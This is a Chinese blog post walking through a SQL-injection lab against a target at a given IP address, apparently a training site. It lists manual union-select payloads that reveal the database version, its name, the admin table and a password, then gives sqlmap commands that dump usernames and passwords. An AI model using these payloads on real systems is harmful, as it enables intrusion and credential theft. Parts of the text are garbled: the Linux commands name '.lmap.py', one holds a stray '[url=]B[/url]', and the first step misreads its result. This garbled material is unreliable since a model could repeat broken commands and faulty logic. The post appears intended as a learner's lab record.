之前记得做过一个sql手工注入的实验,但是现在找不到了,然后时间比较紧也就没有再去拼命的找,就从网上找到了大佬的博客跟着步骤一点一点去做吧
实验原博客地址:https://www.cnblogs.com/hahayixiao/p/10256636.html
sqlmap
http://117.41.229.122:8003/?id=1 PS:幸好现在还有啊
①
http://117.41.229.122:8003/?id=1 and 1=1
并没有什么变化,说明此处不存在注入点
②
http://117.41.229.122:8003/?id=1 and 1=2
首页发生变化,说明此处存在注入点
关键使用order by
http://117.41.229.122:8003/?id=1 order by 50
并没有什么变化,原来的首页依旧没有出现,说明数量猜测错误
重新猜测:
http://117.41.229.122:8003/?id=1 order by 2
原来的首页重新出现,说明注入点数量猜测正确,注入点个数为2个
union select 联合查询SQL语句
http://117.41.229.122:8003/?id=1 and 1=2 union select 1,2
显示了字段2
http://117.41.229.122:8003/?id=1 and 1=2 union select 1,version()
注意:在显现字段处,写查询的事务
数据库版本号为5.5.53
http://117.41.229.122:8003/?id=1 and 1=2 union select 1,database()
数据库名称为:maoshe
http://117.41.229.122:8003/?id=1 and 1=2 UNION SELECT 1,table_name from information_schema.tables where table_schema=database()
在数据库maoshe里有一个数据表admin
http://117.41.229.122:8003/?id=1 and 1=2 UNION SELECT 1,password from admin
找到密码为hellohack
win: python sqlmap.py -u "网址?id=1" 【id等于几可以随便输入,但是必须输入且只能为数字】
Linux : .lmap.py -u "网址?id=7" 【id等于几可以随便输入,但是必须输入且只能为数字】
这里只尝试了win:
找的你的sqlmap.py文件,shift+右键选择在此处打开powershell(win10),输入命令
python sqlmap.py -u "http://117.41.229.122:8003/?id=1"
测试界面是这个样子的,emmm小辣鸡到这个位置是真的看不懂
win: python sqlmap.py -u "http://117.41.229.122:8003/?id=1" --tables
Linux: .lmap.py -u "http://117.41.229.122:8003/?id=1" --tables
win: python sqlmap.py -u "http://117.41.229.122:8003/?id=1" --columns -T admin
Linux: .lmap.py -u "http://117.41.229.122:8003/?id=1" --columns -T admin
win: python sqlmap.py -u "http://117.41.229.122:8003/?id=1" --dump -T admin -C "username,password"
Linux: .lmap.py -u "http://117.41.229.122:8003/?id=1" --dump -T admin -C "username,[url=]B[/url]password"
得到答案